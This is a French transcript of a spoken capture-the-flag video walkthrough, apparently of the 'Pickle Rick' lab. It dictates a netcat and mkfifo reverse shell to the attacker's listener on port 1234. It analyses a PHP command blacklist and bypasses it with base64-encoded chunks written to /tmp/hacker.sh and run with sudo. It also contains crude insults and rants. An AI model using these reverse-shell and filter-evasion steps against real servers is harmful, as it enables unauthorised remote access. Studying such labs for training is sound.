en bash. Donc, je vais essayer de faire très simple pour vous résumer. Je vais ouvrir un port sur ma machine. Un, 2, 3, 4. Maintenant, vous connaissez le bail, comme disent les jeunes. Un, 2, 3, 4. Parce que, hum, parce que mon port est ouvert sur mon pare-feu. Donc là, je lance mon auditeur, le fameux listener. Maintenant que je vais essayer de récupérer une connexion via le serveur. Est-ce que je peux utiliser NC? Visiblement, NC, je peux l'utiliser. Si je fais un NCE, ça a l'air de marcher. Est-ce que je pourrais pas me servir de Netcat pour ouvrir une connexion? Donc NC 10 11 11, l'adresse de ma machine, le port 1, 2, 3 et le fameux mode appelé E. E pour ouvrir un processus interactif. Lancer un processus interactif. Le processus qu'on veut, c'est quoi? C'est bin sh. Non, ça marche pas. Donc il faut trouver une autre connexion. Là, on voit que la connexion est foire. Visiblement, soit le N4E-E ne marche pas, soit on a une version Net4 entre guillemets sécurisée qui ne permet pas de lancer ça. Donc comment on peut faire? On peut peut-être essayer de créer un script et d'ouvrir la connexion sur la machine. Si vous avez suivi mes cours, je vous ai appris à faire un cas FIFO. Qu'est-ce qu'on peut faire? Je vais faire un touch. Touch, ça crée un fichier. Le fichier, je l'appelle test.sh. Je vais faire un script bash, ok? Et je vais lui dire, tu vas me le créer pas là, parce que je suis dans www.var HTML. Tu vas me le créer dans tmp et tu vas me créer un fichier qui s'appelle test.sh. Maintenant, je continue d'utiliser la LFI, mon attaque LFI pour savoir qu'est-ce que je fais, où je vais, qu'est-ce que je peux faire. Qu'est-ce que je veux? Je veux que tu me fasses un sudo ls-la et tu m'affiches tout dans TEP. Comme par magie, l'utilisateur que je suis, www.data, Honor Group, je suis www.data, je fais partie du groupe wdata et j'ai créé un fichier test.bash, sh, avec ces droits. Ok? Donc je peux écrire dans quoi? Dans le fichier, enfin dans l'arborescence TMP du serveur. Donc ça, c'est notre point d'entrée pour créer notre chaîne. On sait qu'on peut maintenant faire ce qu'on veut dans TMP en tant que W data. Qu'est-ce que je vais faire? Je vais faire un FIFO. Je vais créer mon FIFO, MK FIFO. Donc, je vous redis pas les commandes. Vous devriez les connaître maintenant par cœur. On fait un rm-f tmp f, fin de l'instruction, point virgule, et je veux mon mk FIFO dans, pareil, tmp f, fin de l'instruction. J'exécute, il se passe rien, c'est normal. Et là, qu'est-ce que je veux? Je veux un 4 que tu m'affiches ce que j'ai mis dans F. Je peux même tenter le sudo pour voir si ça nous donne plus de droits. Sudo 4 tmpf et je pipe les commandes. Je veux quoi? Je, je suis en train de créer un reverse shell en bash. Je veux mon bin -i interactif. Je veux la redirection des erreurs avec ces deux $1 comme on fait d'habitude. Je veux quoi? Nen4 sur ma machine. Bon, un 2 3 4
Et tout ça, tu me l'enregistres dans quoi? Bah, dans mon fichier MK FIFO, qui est dans temp et dans l'arborescence F, sous arborescence. Hop. Et là, qu'est-ce qu'il nous dit? Ah non, 4, y a pas moyen que ça marche, en fait. Donc là, je suis un petit peu de la baise. Je suis baisé parce il me bloque les commandes. Donc il faut qu'on trouve un moyen de contourner le système, en fait, de lui baiser la gueule, hein. Excusez-moi, je dis ça très vulgairement. Comment on peut faire ça? Eh ben, déjà, faut qu'on creuse, qu'on en sache un petit peu plus. Là, je suis sur Portal PHP. On va voir le code source. On a ça, ok. Rien de bien sympa. Revenons en arrière. Faisons un grep R, comme je vous ai montré. Ah, le code source, là, avec le grep, il nous a récupéré toutes les ressources. Je vois des trucs en rouge. Donc là, on va faire ça. Ok? On est en HTML, il y a de l'injection de code PHP. On voit les balises login PHP, login PHP. Qu'est-ce qu'il dit? Il dit, bah, forcément, je veux un nom d'utilisateur qui soit valable, égal à true, et je veux que tu récupères la valeur en poste, dollar $post. Et je veux quoi? Que cette valeur, eh ben, elle soit égale au mot de passe qui appartient à l'utilisateur qui est Rick Rules. Ok? Et on a vu que c'était blablabla. Bla, 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 bla. Si c'est ça, eh ben, tu connectes l'utilisateur. Ok? Pour l'instant, bah, ce qui paraît logique. On redescend encore dans le code source. Là, pareil. On a le login, on a notre premier ingrédient. Rien de bien sympa. Ah là, c'est intéressant. Là, on a à nouveau une injection de code PHP dans le code HTML qui nous dit quoi? Bah, tu vas faire une boucle en fait qui contient quoi? Bah, des strings, donc des chaînes de caractères, et tu vas me les placer dans un tableau. Tu vas parcourir le tableau quand on fait une boucle de programmation. Là, c'est une boucle itérative. Tu vas boucler sur un tableau, et dans ce tableau, il y a quoi? Dans le tableau, je te mets quoi? Je te mets la commande cat, je te mets la commande head, je te mets la commande more, je te mets la commande tail, je te mets la commande nano, je te mets la commande vim, je te mets la commande vi. Ça, tout ça, ces valeurs, elles sont comprises dans mon array. Array en anglais, c'est un tableau. Qu'est-ce qu'on a défini? On a défini un tableau. Et quand on a fait, on a défini notre fonction. La fonction, elle contient quoi? Elle contient des strings, des chaînes de caractères. Et en effet, ces commandes Linux du système d'exploitation cat, head, more, tail, nano, vim, vi, c'est quoi? C'est des chaînes de caractères. C'est un caractère. A, c'est un caractère. Cat, c'est une chaîne de caractères. Head, c'est une chaîne de caractères. More, c'est une chaîne de caractères. Vous avez compris où je veux en venir. Qu'est-ce que fait la fonction for each pour tous ces strings? Ça va parcourir ce que je rentre. Donc, je peux rentrer Bobby. Bobby est pas contenu dans le tableau. Il va dire, OK, je passe à l'étape suivante. Par contre, si je rentre 4, head, more, tail, nano, vim, vi, là, il va m'afficher quoi? Il va m'afficher ce message grâce à la boucle de programmation. Il va me dire command disable to make it hard to future. Pickle Rick. OK? Donc là, il y a quoi? Eh ben, il y a soit les strings qui sont contenus dans le tableau cat, head, more, vim, je les rentre et il affiche quoi? Ça. Et ça, c'est quoi? Eh ben, c'est la première, comment dire, étape de la boucle. Echo, command disable, make it hard for future. On voit là, c'est exactement ce qui m'affiche là. Soit, je rentre une autre commande, et une autre commande, c'est quoi? C'est un string, une chaîne de caractères qui n'est pas contenu dans le tableau. Donc c'est pas true, c'est false.
Si c'est false, eh ben, je sors de ma boucle. Et dans ma boucle, j'ai quoi? J'ai if, si, si ça fait partie de ces commandes, ces chaînes de caractères, ces commandes, t'affiches ça. Sinon, else, je sors de ma boucle, eh ben, tu m'as output, tu m'affiches la commande. Tu rentres la commande. Shell exec, t'exécutes la commande, $post à partir de la méthode post, et t'exécutes une commande. Et tu affiches ce que fait la commande. Et en effet, si je mets autre chose que 4 et que je fais par exemple une autre commande, ls m'affiche le résultat. Echo, output, output égale shell exec post command. Pourquoi? Parce que ls n'est pas contenu dans l'arrêt, dans le tableau. Et dans le tableau, eh ben, si c'est vrai, ls, c'est pas vrai. ls ne fait ni partie de cat, ni de head, ni de more, ni de tel, ni de nano, ni de vim, ni de vi. Donc c'est faux. Si c'est faux, tu passes à else. Else, t'affiches la commande. Donc c'est grâce à cette boucle de programmation qu'on a pu faire notre LFI et on voit que là, on est bloqué puisque pour faire notre bash shell, récupérer un reverse shell sur notre machine, moi je veux utiliser cat. Et cat, il me dit, bah non, cat, c'est vrai, c'est pas false. Donc return true. Donc si cat est présent dans le tableau, et c'est le cas, eh ben, en gros, va te faire foutre. La commande est désactivée. Donc là, on est bloqué. On a fait du pass à pied pass. On s'est baladé sur le site pour comprendre et faire de la rétro-ingénierie, comprendre comment fonctionnait le site. On a analysé le code source. On a vu qu'on pouvait faire des LFI, Local File Inclusion, qui me permettaient de récupérer mes trois ingrédients. À la limite, j'ai terminé le capture de flag. Mais on va aller plus loin et c'est pour ça que je suis en train de vous expliquer tout ça. Maintenant, moi, je veux un shell. Comment je peux contourner? Je vous ai toujours dit comment on contourne un système de défense, comment on contourne un antivirus, comment on contourne un WAF, un pare-feu d'une application web. Et là, c'est le cas. Là, en gros, c'est une sorte de WAF. On a programmé dans le code source en PHP en disant bah, si l'utilisateur il rentre cette commande, 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 tu bloques. Tu bloques les communications et tu lui dis va te faire foutre. Comment je peux faire? Bah, je vous ai dit offuscation. Qui dit offuscation dit je vous ai perdu de l'encodage, de l'encoding. On va coder, on va coder, on va offusquer notre code source. Comment je peux faire ça? Eh ben, je vais utiliser le base 64. Je vais utiliser, donc, vous connaissez maintenant la base octal qui nous permet de définir des droits sous, avec la commande chmod sous Linux ou Unix. On va utiliser le base 64. Je vous montre un exemple très simple. Je vais aller coder mes instructions en base 67. Là, je dis bonjour, je suis un hacker. Ça, c'est quoi? C'est de l'ASCII. Ok? C'est un string ASCII, c'est une chaîne de caractères codés en ASCII, A-S-C-I-I, et c'est une chaîne de caractères en langage français. Elle est composée de quoi? Bonjour, je suis un hacker. Toute cette chaîne de caractères, bonjour, je suis un hacker, c'est quoi? Ce sont des caractères de l'alphabet, de A à Z en français. Maintenant, si je l'encode, eh ben là, on a le même résultat. Bonjour, je suis un hacker en base 64. Et là, si jamais je mets 4, je suis un chat, bonjour, je suis un hacker, qu'est-ce que fait le système de protection sur le serveur? Il fait 1. Oh, 4. J'ai vu 4. Je te bloque. Donc, qu'est-ce qui se passe? Eh ben, notre commande, elle est bloquée. Par contre, si je l'encode, 4, bonjour, je suis un hacker.
je l'encode. Voilà, maintenant ça devient ça. Et ça, bah, l'ordinateur, il l'exécute. Sauf qu'il l'exécute, et quand il l'exécute, eh ben, en fait, il contourne la protection. Et il va faire notre fameux 4. Bonjour, je suis un hacker. Donc, on va refaire notre payload qui ne marchait pas tout à l'heure dans l'arborescence TMP du serveur et on va offusquer notre code. Là, on rentre dans le sérieux. Vous allez apprendre à contourner les antivirus. Vous allez apprendre à contourner tous les systèmes de protection. Et là, en apprenant et en comprenant ce que vous faites, là, vous êtes un hacker. Vous n'êtes pas un gars qui regarde des vidéos sur YouTube qui pense être un hacker. Ça fait une grosse différence. Ne soyez pas un script qui dit comprenez, apprenez ce que vous faites. Ok? C'est pour ça que je vous bourre le crâne, parce que je vous ai toujours dit, il y a une éthique. Un hacker, c'est pas le gars qui regarde des vidéos, qui lit des livres et qui va apprendre à hacker. Il faut que vous ayez une éthique, que vous compreniez ce que vous faites. Sinon, vous êtes des abrutis, en fait. Pourquoi je vous dis la société, les gens, c'est des moutons. En fait, ils passent leur vie, ils comprennent rien. Vous êtes des esclaves de la société. Vous êtes des esclaves de la technologie. Mais à vous de voir. Vous voulez être des consommateurs. Allez chez Carrefour, allez sur Amazon, allez chez Auchan. Consommez. Dépensez votre argent bêtement à la fin du mois. Si ça vous permet d'exister, vous êtes heureux, tant mieux. Nous, les hackers, on veut comprendre. Et c'est ce que j'essaie de vous inculquer. Tout concept, eh ben, il va falloir comprendre toutes les techniques sous-jacentes. Donc ne soyez pas passif, apprenez, ça prend du temps, c'est compliqué. Je m'arrête là. Maintenant, on va voir comment offusquer le code. Qu'est-ce que j'ai fait tout à l'heure? Je reviens sur ma machine. Et vous allez voir, on a une fonction base 64 et base 64-D. Base 64, c'est quoi? Bah, c'est un programme. On va voir. Est-ce que je peux faire un H? Non. Il y a deux options que vous allez utiliser. Base 64 tout court, ça permet d'encoder une chaîne de caractères en base 64, mathématiquement. Base 64-D, ça va permettre de décoder les données en string, en chaîne de caractères ASCII, que les humains comprennent. L'ordinateur, lui, il s'en fout. Il comprend les chaînes de caractères, il comprend l'ASCII, il comprend aussi le base 64. Lui, il en a rien à foutre. Par contre, les systèmes de protection qui tournent sur l'ordinateur peuvent bloquer des chaînes de caractères, de l'ASCII, des chaînes de caractères codées en ASCII. Par contre, l'ordinateur en base 64, il exécute, il se pose pas de questions et les systèmes de protection, eh ben, ils se font baiser par le base 64. Donc, pensez base 64. On va exactement refaire ce qu'on a vu précédemment. On va créer un reverse shell sur le port 1, 2, 3, 4 de ma machine. Et là, on l'a, hein, il est en train de tourner. Il attend les communications. Et on va créer le payload, la charge utile virale, et on va l'encoder en base 64. Et après, on va demander dans notre code source de décoder les données en string qui vont être exécutées. Mais comme d'abord elles seront encodées avant de les décoder, eh ben on va baiser le système. On va lui niquer sa mère. Voilà comment ça marche. Donc on va voir ça. Je suis un petit peu vulgaire, mais voilà, maintenant là, on fait du sale. Il va falloir apprendre. Donc comment on fait ça? Eh ben, on va revoir notre charge utile. Vous vous rappelez, je vous ai dit, on fait notre MK FIFO et après on crée notre bash. Eh ben là, on va faire exactement pareil, sauf que on va temporiser. On sait qu'on est un petit peu bloqué, on n'a pas la commande, comment dire, println. Je vais vous montrer un truc très simple que vous compreniez bien en fait. Euh, Comment je peux vous expliquer ça? Allez, je reviens sur ma machine, que vous compreniez, qu'on me dise pas, tu vas trop vite, Marco, je comprends rien à ce que tu me dis. Ok, je fais un touch. Touch, je crée un nouveau fichier. Je le crée dans TMP puisque je sais qu'on a les droits. Et je crée un fichier qui s'appelle A, ok, .sh. C'est un fichier bash, SH, extension de fichier bash qui s'appelle A.
tout court. Ok? Fin de l'instruction. Parce que là, on n'est pas sur mon terminal, on est en bash, donc pensez point virgule. Sinon, l'ordinateur ne comprend pas que vous voulez terminer l'instruction. Faudra le faire à chaque fois. Ok. Comment je peux vous montrer que ça marche? Bah, on va faire un LS, pardon, TMP. Et dans TMP, il y a quoi? Il y a mon A.sh. Ok? Maintenant, je vais vous montrer un autre truc. ls.la dans TMP. Fait quoi en taille, mon A? Il fait 0 byte, il fait 0 kilobyte, il fait 0 mégabyte, il fait 0 gigabyte, il fait 0 terabyte. Pourquoi? Parce qu'on n'a pas écrit dessus. Il n'y a aucune donnée. Il n'y a que la métadonnée avec les droits, le nom de l'utilisateur, le groupe et le nom du fichier. Et ça, c'est des métadonnées. Ça prend aucun espace ou très peu. Et c'est tellement infime que ça fait moins d'un octet. Donc le système d'exploitation, il le compte même pas. Le fichier fait 0 octet, ok, ou 0 byte. Voyez-le comme ça. Donc maintenant, on va essayer d'écrire dessus. Comment je peux écrire? Il y a une commande qui s'appelle print et surtout printf en fait en bash. Et là, je vais lui dire, écoute, qu'est-ce que tu vas me faire? Eh ben, tu vas m'afficher le fichier bonjour, je suis hacker. Je ferme avec une simple quote. Donc, je lui demande d'enregistrer print en fait, hein, parce que je vous ai dit, c'est pas une imprimante. Là, c'est un fichier en redirection. Ça pourrait être affiché sur notre écran. Là, ça va être affiché sur quoi? Ça va être affiché dans un fichier. Donc là, je lui dis quoi? Bah, tu m'affiches ça et tu me le mets dans quoi? Bah, tu me le mets dans TMP et notre fameux fichier qui s'appelle quoi? A.sh. Ok? Je refais sudo ls la, je veux tous les fichiers dans temp. Là, on a vu qu'il fait 22. Donc, on arrive à écrire. On arrive à écrire. Le problème, c'est que tout à l'heure, j'ai fait un print et j'ai créé shell qui s'appelait test sh et on a vu qu'avec un moment ça bloque en fait. On pourrait débugger et je pourrais vous montrer comment débugger en fait ce qu'on a fait et comprendre pourquoi le reverse shell ne fonctionne pas, mais j'ai pas envie de passer encore une demi-heure. On va faire très simple. Ce que j'en ai conclu avec mon expérience, c'est que printlf, on peut pas l'utiliser. Qu'est-ce qu'on peut utiliser à la place? On peut utiliser echo. Echo, hello, je suis un hacker. Ça marche, il m'affiche le résultat. Donc qu'est-ce que je vais faire? Je vais remplacer tout ce que j'avais fait avec print f en echo. Donc on reprend, je crée mon mk FIFO. On repart de zéro, je fais zoomer. Oui, je sais que je suis un hacker et je t'emmerde, connard. Donc, qu'est-ce qu'on va faire? Ben, on va reprendre tout notre code source de A à Z et on va le découper en morceaux. C'est ce qu'on appelle des chunks pour pouvoir tromper en fait le système et contourner les protections. On va faire deux chunks. Je pourrais le faire en entier, mais je suis bloqué par le pare-feu de l'application et par les règles en PHP qui sont dictées dans le code source. Comment je peux contourner le système? Bah, c'est pas grave. Ce que je devais faire en une fois, je vais le faire en deux fois. Et comment je peux le faire en deux fois? Bah, je vais découper mon code. Je vais découper mon code source en quoi? Eh ben, tout simplement en chunks. Donc, on va faire le premier chunks. Et le premier chunk, c'est quoi? Eh ben, c'est tout simplement, en fait, le MK FIFO. On va se créer d'abord le MK FIFO et après, on va se créer, eh ben, comment dire, le, le payload. On bash, reverse shell. Donc, qu'est-ce que je fais? Echo, vous vous rappelez, au début, on avait fait un print F. Bah là, on oublie. On sait que la commande, elle marche pas. Elle est buggée. Je fais quoi? Bah là, je fais mon MK FIFO. Le MK FIFO classique, c'est RM.
t'effaces dans TMP-F. Si jamais il y a déjà un répertoire qui existe qui s'appelle F dans TMP, tu l'effaces pour être sûr, parce que moi je vais m'en servir. Ensuite, je veux quoi? Tu utilises le programme MKFIFO. Allez voir sur internet ou suivez mes cours pour comprendre ce que je suis en train de faire. Et là, tu utilises le TMP-F. Comme j'ai fait un RM, je sais qu'il sera pas présent, je n'aurai pas un message d'erreur. Donc je l'efface s'il existe sur le système et je le recrée avec mon MK FIFO. Fin de l'instruction, point virgule. Donc là, qu'est-ce qu'on fait? On pipe, mais c'est pas vraiment un pipe. On fait une attaque séquentielle. On code séquentiellement tout ça. Donc là, il y a quoi? Il y a deux instructions. Première instruction, echo. Tu m'enregistres tout et cette commande de là à là. Et dans cette commande, il y a quoi? Il y a deux instructions. Il y a la première instruction, rm tmp f, tu m'effaces la sous-arborescence f dans le répertoire tmp sur le serveur, point virgule, tu passes à l'instruction suivante. Et là, tu me fais un mk FIFO et tu recrées le tmp f, point virgule, et le petit single quote pour terminer. Parce que après, on va piper et on veut quoi? On veut que ça soit codé en base 64. Point virgule. Je termine ma troisième instruction. Donc, echo, tu veux echo quoi? Eh ben, rm tmpf, première instruction, mk fifo tmpf, point virgule, point d'exclamation, simple quote, guillemets simple, et tout ça, le echo, eh ben, tu passes à la troisième instruction pipée, et la troisième instruction, c'est base 64. Tu me l'encodes en base 64, point virgule. Tu termines la troisième instruction. Ça donne quoi? Ça donne ce résultat qui est compréhensible par un humain, et ça nous donne ce résultat. Codé en base 64, c'est exactement la même chose, sauf que ça va nous permettre de contourner le système d'exploitation. Et là, un humain, il comprend rien. Par contre, l'ordinateur, il comprend. Par contre, les systèmes de protection qui sont sur l'ordinateur, ils comprennent rien. Comme l'humain. Ils sont bêtes. Très bêtes. Et dociles. Ça en fait des moutons. Donc, on a codé notre première instruction, on passe à la deuxième. Et on aura fini dans quelques secondes. Vous allez comprendre. 4. Vous vous rappelez 4? 4, je vous ai dit quoi? 4. Pas bon, 4, bip. C'est en roule. 4, je veux pas exécuter. Donc quoi? Va te faire foutre. Eh ben c'est pas grave, on va lui niquer la gueule. On veut quoi? On veut un 4 dans TMPF. Pourquoi? Parce qu'on lui a demandé de faire un notre MK FIFO F dans F. On veut quoi? Eh ben, on veut piper ensuite la commande. Bah, bin bash. Pardon. Bin sh, qui est bin bash en fait, hein. Interactif, on veut que ça soit interactif et on va avoir toutes les erreurs dans notre shell qui soient fonctionnelles et interactifs. Donc, on redirige via les files redirectors que je vous ai déjà expliqué. Et qu'est-ce qu'on veut? On veut un net4 sur ma machine 10, 11, 26, 90 sur le port quoi? Bah, j'ai rien inventé. On est en train d'écouter toutes les communications TCP sur le port 1, 2, 3, 4. Bah, je vais faire 1, 2, 3, 4. Ok? Et tout ça, le echo, on le redirige dans quoi? On travaille dans TMPF, TMPF, TMPF. Putain, si vous avez pas compris, c'est qu'il va falloir bosser. Ok? Et qu'est-ce que je fais? Je termine. Deux points, point virgule, exclamation. C'est l'échappement. Et ensuite, tout ça, je pipe dans quoi? Bah, pareil, il faut que je l'encode en base 64. Donc, je fais base 64, point virgule. Ok, qu'est-ce qu'on vient de faire? J'ai mon premier morceau, first chunk, second chunk. Donc maintenant, dans mon code source, je vais utiliser ça. Mon premier string, mon deuxième string, encodé en base 64. Et c'est ça qui va baiser le système. Mais là, tu vas me dire, Marco, t'es gentil, saltimbanque, tu t'excites, là, tu nous expliques des trucs compliqués, tu fais le malin. Mais là, pour l'instant, comment tu
Comment tu vas interagir avec le serveur? On revient dans notre ligne de commande. Qu'est-ce que je vais faire? Ok, je vais créer un nouveau fichier Dutch dans TMP. On sait qu'on a les droits pour écrire dessus. Je vais l'appeler hacker.sh. Ça fera un fichier bash sh qui s'appelle hacker qui est présent dans TMP avec touch. Je le crée. Ok? Qu'est-ce que je vais faire? Je vais faire un echo parce que je veux rentrer du texte. Qu'est-ce que je vais rentrer? Bah, je vais rentrer en simple quote. Mon premier string, il est là. Copier, coller. J'oublie pas quoi? Bah, guillemets simple. Je referme. Donc, je lui demande d'afficher ça, mais c'est pas fini. En quoi? Bah, il est encodé en base 64. Pour qu'il comprenne, je vais lui dire, tu fais l'opération inverse sur le serveur, tu fais un base 64, mais tiré D. Tu t'y et ça, tu me le mets quoi? Bah, vous vous rappelez, on travaille dans temp, et notre fichier, il s'appelle comment? Il s'appelle hacker. Donc, je fais quoi? Je fais, bah, tu me le mets dans, pardon, j'allais faire une boulette, dans tmp, hacker.sh. Et on termine comment? Que ça rentre dans vos têtes. Point virgule. L'ordinateur voit le point virgule. Il sait qu'il termine toutes les instructions les unes après les autres. Le point virgule. Il sait qu'il termine toutes les instructions les unes après les autres. Séquentiellement, point virgule, il enregistre, il exécute l'opération. Hop. Maintenant, il y a quoi? Bah, deuxième morceau. On continue. Et là, on va revoir le principe de redirection. Et encore une fois, je vous ai dit, on va lentement. Si vous n'avez pas vu mes anciens cours, vous n'allez pas comprendre ce qu'on fait. Donc, n'allez pas trop vite, revoyez les choses calmement. Qu'est-ce qu'on fait maintenant? Bah, on va ajouter le deuxième chunk, le deuxième morceau. On fait quoi? Bah, exactement la même chose. On copie. Qu'est-ce qu'on veut? Eh ben, on veut que ça soit décodé en base 64. On pipe, commande base 64-D cette fois-ci. Et je veux quoi? Que tu me le mets 2. Là, si je fais ça, ça écrase la première ligne, ce qu'on vient de faire. Je lui dis, tu me le mets à la suite dans mon script. Et le script, il est dans quoi? Il est dans TMP. Et il s'appelle comment? Il s'appelle hacker.sh. Et je finis comment? Point virgule. Et là, ça passe pas, fils de pute. Pourquoi ça passe pas? Je recommence. J'ai dû faire une boulette, j'ai tout pris, hein. Je vais rien inventer. Oh putain, je commence à fatiguer. Ouais, on va faire ça pour tirer. Ensuite, tu me l'enregistres à la deuxième ligne de mon TMP hacker et tu finis l'instruction. Ah, sudo ls là laisse même tmp hacker message. Ok, il a pris les commandes. Maintenant, qu'est-ce que je fais? Bah, je l'exécute. Comment on l'exécute? Bah, on a déjà ouvert notre net4, 1, 2, 3, 4. Maintenant, on va exécuter notre fichier sh. Donc, comment je l'exécute? Bah, j'ai juste à lancer bah, le payload
Et le payload, comment je l'exécute concrètement? Eh ben, je l'exécute via un SH. SH, je vous ai dit, pour exécuter un bash, soit vous faites sudo sh, soit vous faites sudo bash, soit, si vous avez de la chance, vous mettez juste le nom du fichier. Hacker, j'en passe et des meilleurs. Mais nous, comme on est en bash, on va faire un sudo sh. C'est qu'il est dans PMP, pardon, et il s'appelle hacker sh.